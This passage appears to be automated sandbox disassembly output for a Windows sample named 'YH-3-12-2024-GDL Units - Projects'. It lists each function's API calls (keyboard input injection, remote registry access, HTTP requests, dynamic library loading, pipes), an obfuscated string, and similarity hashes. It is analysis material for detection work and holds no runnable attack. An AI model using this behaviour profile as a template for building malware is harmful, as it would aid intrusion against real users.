                                                        • Opcode ID: 119d1ad33f50e9a2e122c76301e089bc2960f74508831fcfa17cc1fce6b9abd0
                                                        • Instruction ID: 06c0da12396a7ebeada3b2600697b0d17c0cf51d664c6bf7023e6991a10b9225
                                                        • Opcode Fuzzy Hash: 119d1ad33f50e9a2e122c76301e089bc2960f74508831fcfa17cc1fce6b9abd0
                                                        • Instruction Fuzzy Hash: EF510B34A00209EFCB24DF68C884AAE7BB5FF56360F14816DF995DB2A0D731AD51CB90
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0081D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0081D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0081D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0081D69D
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        APIs
                                                        • _memset.LIBCMT ref: 008227C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008227DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00822822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00885890,00000000), ref: 0082286B
                                                        Strings
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008488DE
                                                        Strings
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: 0R
                                                        • API String ID: 634782764-1916035689
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0084AB60
                                                        • GetWindowRect.USER32(?,?), ref: 0084ABD6
                                                        • PtInRect.USER32(?,?,0084C014), ref: 0084ABE6
                                                        • MessageBeep.USER32(00000000), ref: 0084AC57
                                                        Strings
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID: 0R
                                                        • API String ID: 1352109105-1916035689
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00820B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00820B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00820BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00820BFB
                                                        Strings
                                                        • dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew, xrefs: 00820B5D
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID: dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew
                                                        • API String ID: 432972143-3792667901
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00820C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00820C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00820CE1
                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00820D33
                                                        Strings
                                                        • dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew, xrefs: 00820C9F
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID: dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew
                                                        • API String ID: 432972143-3792667901
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0083D7C5
                                                          • Part of subcall function 007C784B: _memmove.LIBCMT ref: 007C7899
                                                        Strings
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00818F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00818F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00818F57
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00847C4A
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00847C58
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00847C5F
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: 0R$msctls_updown32
                                                        • API String ID: 4014797782-389527805
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0083184C
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00831872
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008318A2
                                                        • InternetCloseHandle.WININET(00000000), ref: 008318E9
                                                          • Part of subcall function 00832483: GetLastError.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 00832498
                                                          • Part of subcall function 00832483: SetEvent.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 008324AD
                                                        Strings
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • GetCursorPos.USER32(?), ref: 0084C4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007FB9AB,?,?,?,?,?), ref: 0084C4E7
                                                        • GetCursorPos.USER32(?), ref: 0084C534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007FB9AB,?,?,?), ref: 0084C56E
                                                        Strings
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID: 0R
                                                        • API String ID: 2864067406-1916035689
                                                        APIs
                                                          • Part of subcall function 007C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007C1D73
                                                          • Part of subcall function 007C1D35: GetStockObject.GDI32(00000011), ref: 007C1D87
                                                          • Part of subcall function 007C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007C1D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00846461
                                                        • LoadLibraryW.KERNEL32(?), ref: 00846468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0084647D
                                                        • DestroyWindow.USER32(?), ref: 00846485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 361d075a78cae3ff1b9c73ca472e74c255fc05e952739d704b048a1f6a0c707b
                                                        • Instruction ID: ed5568c5a502da6a3f504d6e64943167403a0ad00256054ea88cd4f372808d3a
                                                        • Opcode Fuzzy Hash: 361d075a78cae3ff1b9c73ca472e74c255fc05e952739d704b048a1f6a0c707b
                                                        • Instruction Fuzzy Hash: 80218B75200209EBEF104FA4DC84EBA37A9FB5A368F108629FA10D2191E731DC619766
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00826DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00826DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00826E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00826E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 1c8005b3688e7112e7217adb4f17dfd200239ac644dc7f21a499e98985ec0749
                                                        • Instruction ID: d8cb632ce369e819085d5503b0c1f6b3fbed8a9b88e77451402e9cc41cf9d017
                                                        • Opcode Fuzzy Hash: 1c8005b3688e7112e7217adb4f17dfd200239ac644dc7f21a499e98985ec0749
                                                        • Instruction Fuzzy Hash: 3221747960022DABDB209F39EC05A9A77F4FF45760F204A19FDA1D72D0E77199A0CB50
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00826E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00826EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00826ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00826F06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: a64148e8c2a05b39a16c0d95c2e03268f8607f8ad3d903730372aa6883dc6dac
                                                        • Instruction ID: f8e0071aa27bfe7d394fce45c9ec05e024300d547bdf82aacb33367ef8aab3d6
                                                        • Opcode Fuzzy Hash: a64148e8c2a05b39a16c0d95c2e03268f8607f8ad3d903730372aa6883dc6dac
                                                        • Instruction Fuzzy Hash: 1421517D500325DBDB209F69E804A9A77A8FF55724F300A19FDA1D72D0E770A8A1C761
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082AC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0082ACA8
                                                        • __swprintf.LIBCMT ref: 0082ACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0084F910), ref: 0082ACFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: f82b1410f368ec5f545396880a3492e833af095ebf4052cc4c51e2b9e74494a8
                                                        • Instruction ID: d8abd6e3cca9e56632f5b98807a021bbac90c09b770bd22a9dea1a310fa99455
                                                        • Opcode Fuzzy Hash: f82b1410f368ec5f545396880a3492e833af095ebf4052cc4c51e2b9e74494a8
                                                        • Instruction Fuzzy Hash: F9213035A00109EFCB10DF69D949EAE7BB8FF49714B0040ADF909EB352DA75EA41CB61
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00821B19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: 2e1aafad52a582ce170d107e843d2ce6f2a6fea1aa43e3bf20e15dcf79d9d5e6
                                                        • Instruction ID: 010cf5c15f497e28d2883761cd64457422604ad9123f0e38518186d84e452f15
                                                        • Opcode Fuzzy Hash: 2e1aafad52a582ce170d107e843d2ce6f2a6fea1aa43e3bf20e15dcf79d9d5e6
                                                        • Instruction Fuzzy Hash: 89116531940158CFCF00DF94D8599FEB7B4FF29314B108469D818D7651EB325D4ACB50
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0083EC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0083EC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0083ED6A
                                                        • CloseHandle.KERNEL32(?), ref: 0083EDEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: a5626614a8420f54f8f656f658ae904cf93fda0bc7a82142c6e7a9edf47a3e30
                                                        • Instruction ID: 769fc181010fd653639225d9fd7d42eb7273b0f00f673d2ae2452497dc2cc2a5
                                                        • Opcode Fuzzy Hash: a5626614a8420f54f8f656f658ae904cf93fda0bc7a82142c6e7a9edf47a3e30
                                                        • Instruction Fuzzy Hash: CD812F716047009FD760EF18C84AF6AB7E5EF88710F14881DFA95DB2D2D674AC418B91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction ID: 95d38f3445d4af20fc5cc239dc96f7f28ff1b412953a00e105e7798070081fd6
                                                        • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction Fuzzy Hash: CC51E770A02B8DDBCB248F6BDC4456E77B7AF49328F248729F835962D1D7789D608B40
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 00840E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008400FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0084013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00840183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 008401AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 008401BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: 4a5b8e5e9d93ffdc047cf40e33685983ae72e5b218d986647d36ff8d2f1c93b3
                                                        • Instruction ID: 7e2e2a9a448449bab5960545d3601822ef371a1a982c51e69a8c020627927e30
                                                        • Opcode Fuzzy Hash: 4a5b8e5e9d93ffdc047cf40e33685983ae72e5b218d986647d36ff8d2f1c93b3
                                                        • Instruction Fuzzy Hash: 25510771208208AFD714EB68C885E6BB7E9FF84314F40892DB695972A2DB35E944CB52
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0083D927
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0083D9AA
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0083D9C6
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0083DA07
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0083DA21
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00827896,?,?,00000000), ref: 007C5A2C
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00827896,?,?,00000000,?,?), ref: 007C5A50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 546be67bef4eeb8fcb13c10fbf09ec960cb8729fb4a142ec8e0016921db76ec6
                                                        • Instruction ID: afcb60102ba84ef17c97e69db9b5776bedd1bb467f32a0e52becf49b862caefd
                                                        • Opcode Fuzzy Hash: 546be67bef4eeb8fcb13c10fbf09ec960cb8729fb4a142ec8e0016921db76ec6
                                                        • Instruction Fuzzy Hash: 0451F575A00209DFCB00EFA8D488EADBBF5FF49324F148069E955AB312DB35AD45CB91
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0082E61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0082E648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0082E687
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0082E6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0082E6B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 6e7bbd336b43a449e7e3d3a46b942d94eeb76133192ad5c7ddfe7396cec472b4
                                                        • Instruction ID: 101c6cc826aa34b36c0971180e0e6322cfe4a549fe478f4c4383812964fd8156
                                                        • Opcode Fuzzy Hash: 6e7bbd336b43a449e7e3d3a46b942d94eeb76133192ad5c7ddfe7396cec472b4
                                                        • Instruction Fuzzy Hash: 05510935A00215DFCB01EF65C989EADBBF5FF09314B1480A9E909AB362CB35ED51DB50
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008163E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00816433
                                                        • TranslateMessage.USER32(?), ref: 0081645C
                                                        • DispatchMessageW.USER32(?), ref: 00816466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00816475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 089585590769609aae5b952c8b6e88222800e9efd45ff03c7b3f246c84a2fe2c
                                                        • Instruction ID: de11bf26719517b75b9f855835e58ad9f59e0b09f78b4a8d319fbf9f3b002c75
                                                        • Opcode Fuzzy Hash: 089585590769609aae5b952c8b6e88222800e9efd45ff03c7b3f246c84a2fe2c
                                                        • Instruction Fuzzy Hash: 9531DE31900616EFDB24CFB89C44BF67BACFF01304F14416AE5A1C21A1FB2598E9DBA4
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00818A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00818ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00818AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00818AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00818AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 6b0f1e824c005419c0cd331344f6e09143775623fb34212bdbb23ce1b78f5a12
                                                        • Instruction ID: 4141c1e5d66a048e557e8c92b44cd78cf610cb134aa926580d0b7cb9350947a1
                                                        • Opcode Fuzzy Hash: 6b0f1e824c005419c0cd331344f6e09143775623fb34212bdbb23ce1b78f5a12
                                                        • Instruction Fuzzy Hash: 4631DF71500229EFDB14CFA8D94DADE3BB9FF05315F10822AF925E61D1C7B09950CB91
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0081B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0081B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0081B259
